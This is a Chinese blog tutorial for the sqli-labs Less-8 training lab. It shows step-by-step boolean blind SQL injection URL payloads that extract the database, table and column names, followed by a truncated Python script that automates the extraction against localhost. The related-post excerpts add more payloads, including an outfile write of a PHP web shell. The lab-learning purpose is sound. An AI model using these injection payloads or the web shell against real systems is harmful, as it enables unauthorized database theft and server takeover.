sqli-labs Less-8

最新推荐文章于 2024-04-05 04:10:10 发布
最新推荐文章于 2024-04-05 04:10:10 发布
阅读量1.4k 收藏 5
点赞数 2
分类专栏: sqli-labs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42630215/article/details/104831991
版权
本文介绍了如何利用布尔盲注方法在存在SQL注入漏洞的网站中获取数据库信息,包括数据库名、表名、列名以及数据。通过构造特定的SQL查询并观察页面响应,逐步揭示了数据库的第一位字母,然后通过ASCII值判断其他部分,最终成功获取敏感信息。
摘要由CSDN通过智能技术生成

Less-8 Get - Blind -Boolian Based -Single Quotes
1.原页面在这里插入图片描述
2.?id=1在这里插入图片描述
3.?id=1’
在这里插入图片描述
4.尝试布尔盲注
代码存在sql注入漏洞,然而页面既不会回显数据,也不会回显错误信息,我们可以通过构造语句,来判断数据库信息的正确性,再通过页面的“真”和“假”来识别我们判断的是否正确
?id=1’ and (length(database()))>0 --+
在这里插入图片描述
?id=1’ and (length(database()))<0 --+
在这里插入图片描述
5.判断数据库第一位
?id=1’%20and%20(select%20ascii(substr(database(),1,1)))>100–+
第一位是否大于100,是就显示正确,不是就显示错误。
substr()函数:substr(a,b,c)从b位置开始,截取字符串a的c长度ascii()函数:ascii()将某个字符转换为ascii值在这里插入图片描述
判断范围,看看大不大于120
?id=1’%20and%20(select%20ascii(substr(database(),1,1)))>120–+在这里插入图片描述
不大于120 ,缩小范围看看大不大于115

?id=1’%20and%20(select%20ascii(substr(database(),1,1)))>115–+
在这里插入图片描述
?id=1’%20and%20(select%20ascii(substr(database(),1,1)))>114–+
在这里插入图片描述
?id=1’%20and%20(select%20ascii(substr(database(),1,1)))=115–+
在这里插入图片描述
数据库名第一位为115 ,我们查下ASCII对照表,第一位是s。
依次判断数据库剩下的部分。

6.依次猜测表名
?id=1’ and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101–+
在这里插入图片描述
7.依次猜测列名
?id=1’ and (select ascii(substr((select columns_name from information_schema.columns where table_name=’users’ limit 0,1),1,1)))=117–+
在这里插入图片描述

依次猜解效率不高,可以通过编写python 脚本。(搬来了大佬写的脚本 python27运行)

8.获取数据库名和用户:

# -*- coding:utf8 -*-
import requests
url = 'http://127.0.0.1/sqli/Less-8/?id=1%27'  # 这个url要对应你自己的url
payload = " and%20left({d}(),{n})=%27{s}%27%20--%20k"
# 上面两个可以合并为一个,但没有必要,(本来就是我拆开的)
list1 = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
         'w', 'x', 'y', 'z', '@', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0']  # 字典
str1 = "You are in..........."  # 就是通过返回的页面里有没有这个字符串来判断盲注有没有成功
# 开始对比database()
database = ''
for i in range(1, 10):  # 相当于C语言的for循环1~9 其实这里应该先判断database有多长的
    for ss in list1:  # 相当于for循环遍历list,然后把每一项赋值给ss
        p = payload.format(d='database', n=i, s=database+ss)  # 把payload里的{d},{n},{s}赋值
        u = requests.get(url+p)  # 访问网页
        # print p
        if str1 in u.content:  # 如果str在网页内容里面
            database += ss
            print u"正在对比database第", i, u"个字符",
            print database
            break
print u"对比成功,database为:", database
# 开始对比user()#user也是同理
user = ''
for i in range(1, 20):
    for ss in list1:
        p = payload.format(d='user', n=i, s=</
最低0.47元/天 解锁文章
S1xTwe1ve
关注
专栏目录
sqli-labs Less-8(布尔盲注)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-11 616
布尔盲注其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利用页面的返回结果来得知判断语句是否正确。 再学习布尔盲注之前,一些常用函数如下: length(): 返回字符串长度。 substr(str, start, len): 截取str,从start开始,截取长度为len。 ascii(): 返回字符串的ascii码。 1、判断共有几个数据库 payload ?id=1' and (select count(schema_na
SQLi第八关,Sqli-labs Less-8,sqlibals less8
m0_61408947的博客
04-12 826
如果你也是看准了Python,想自学Python,在这里为大家准备了丰厚的免费。
sqlilabs—less8
一个普普通通的博客
03-24 822
sqlilabs—less8
sqli-labs(less-8)
墨鱼菜鸡
09-10 312
目录 less-8(布尔盲注)手工 1.判断闭合方式 2.判断数据库个数 3.判断第一个数据库字符长度 4.根据ascii码判断每个库名的具体字符 5.判断security库中表的个数 6.判断security库里第一个表名的长度 7.判断security库里第一个表的第一个字符的ascii值 8.判断security.users表的...
sqli-labs(less8)
m0_68980215的博客
07-08 267
lesson8
Sqli-labs之Less-8
→_→
03-30 2017
Less-8 GET-盲注-基于布尔值-单引号 根据题目提示可知这是单引号注入且需要通过盲注进行通关,那么首先利用单引号看一下网页的回显: 测试是否是注入点 发现什么也没有,也就是说网页不会返回任何报错信息,也不会返回其他信息即没有任何回显信息, Less1、5、7、8回显对比 ...
SQLi LABS Less-8 布尔盲注
热门推荐
wangyuxiang946的博客
06-27 1万+
SQLi第八关,sqllabs less-8,sqli-labs less8 第一步,判断注入类型 先正常给一个id ?id=1 正常登录 , 提示 you are in 加个单引号' 试试 ?id=1' 没有反应 , 估计是后端报错了 , 但没有返回报错结果 再试试双引号" ?id=1" 又正常登录了 , 看来后端的SQL对单引号没有过滤 接下来验证一下,到底是不是单引号' ?id=1' and false -- a 加个fa...
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
Python面试题大全SQLi第八关,Sqli-labs Less-8,Python知识总结
m0_60144796的博客
04-05 363
Python崛起并且风靡,因为优点多、应用领域广、被大牛们认可。学习 Python 门槛很低,但它的晋级路线很多,通过它你能进入机器学习、数据挖掘、大数据,CS等更加高级的领域。Python可以做网络应用,可以做科学计算,数据分析,可以做网络爬虫,可以做机器学习、自然语言处理、可以写游戏、可以做桌面应用…Python可以做的很多,你需要学好基础,再选择明确的方向。这里给大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
sqli-labs lesson8 python 脚本源代码(存在小bug)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈(在结果的格式化输出那有个小bug,用户名和密码没有正确对应,修改后的代码我又上传了,抱歉,,,)
sqli-labs lesson8 python 脚本源代码(修复小bug后的版本)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈
sqli-labs ————less -8
Fly_鹏程万里
05-11 1010
Less-8为了好分析,我们首先可以查看一下源代码关键代码:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql);从这里我们可以看到,可以通过' or 1=1 --+或者  ' and 1=1 来绕过从源文件中我们可以看到,该文件中将“print mysql_error”进行了注释,所以这里我们...
网络安全-sqlmap实战之sqlilabs-Less8
关注网络安全、云原生安全
06-29 1325
目录 类型 -dbs枚举数据库 --tables枚举数据库表 --columns枚举列 --dump枚举数据 查看源代码 类型 布尔盲注-单引号 猜测出sql语句 SELECT * FROM users where id = '参数' LIMIT 0,1 -dbs枚举数据库 使用-o参数优化,--batch参数进行跳过 python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-8/?id=1" -o -dbs --
Sqlilabs Less 8-10 Blind Injection
baynk的博客
02-25 305
加上Less 5-6可以说是一套简单的盲注类型题目了。基于布尔型盲注,基于时间型盲注,基于报错型盲注都有。 Less 8 GET - Blind - Boolian Based - Single Quotes 手工注入 看题目的提示知道是单引号的闭合方式,这里就不慢慢试了,而且发现只有正常显示和空白两种页面,估计是关了报错,只能做盲注了,这里先用基于布尔型的盲注吧,符合题意。 先猜解数据库。 ...
Sqlilabs Less-8
Light_inthe_eyes的博客
03-03 113
判断是单引号字符型注入: ?id=1'和?id=1'--+ 判断列数: ?id=1' order by 3--+ 用延迟注入方法爆库名的长度: ?id=1' union select 1,2,if(length(database())=8,sleep(5),1) -- 反应5s弹出画面: 后面的操作也是一步一步延迟注入,去猜表名列名数据名 ...
SqliLabs Less8
qq_45785324的博客
07-08 123
sqlilabs
sqli-labs (less-8)
kukudeshuo的博客
03-08 253
sqli-labs (less-8) 输入 http://127.0.0.1/sql1/Less-8/?id=1 #回显正常 http://127.0.0.1/sql1/Less-8/?id=1' #没有任何回显 http://127.0.0.1/sql1/Less-8/?id=1'--+ #回显正常 这里我们可以判断为字符型注入,但是他既没有具体错误回显也没有数据显示,所以这里我们只能选择使用Boolean盲注 http://127.0.0.1/sql1/Less-8/?id=1' and len
SQLI-Lab】-Less8
xinyue9966的博客
01-26 368
Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)前言一、GET字符型注入二、步骤总结 前言 一、GET字符型注入 执行数据库查询,并在回显点展示。 用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。 二、步骤 和第7题思路过程一样,不过不需要写入、闭合字段后,开始用burp suite爆,具体过程不再细讲。 盲注爆库长度payload
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码字段。攻击者可以通过在输入框中输入特定的字符串来尝试绕过认证。 如果您想深入学习SQL注入攻击技术,sqli-labs-less1可能是一个很好的练习平台。但请注意,这个平台是为了学术目的而设计的,不要在未授权的情况下尝试对任何真实的系统进行SQL注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值